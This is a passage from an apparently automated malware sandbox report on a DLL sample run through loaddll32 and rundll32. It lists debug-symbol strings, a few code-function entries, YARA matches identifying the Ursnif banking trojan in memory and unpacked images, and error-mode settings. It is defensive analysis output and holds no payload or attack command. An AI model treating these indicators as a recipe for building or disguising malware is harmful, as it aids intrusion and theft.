                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbvv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb: source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbnv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbE source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbO{ source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbQt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdbr source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbLy source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbby source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbXv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbx source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbQ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbet source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbst source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.1186382182.000000006E34B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1187500512.000000006E34B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: wsspicli.pdbWt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbw source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbCt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.879269729.0000000000684000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb]t source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbbv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbhv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbpv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbI source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbOt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdbIt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbkt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb|v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: imagehlp.pdb^v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdbEm5 source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb&v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbyt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb,v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891777281.00000000009AC000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdbC source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbRv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbDv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E30AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E30AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0497ABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0497AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
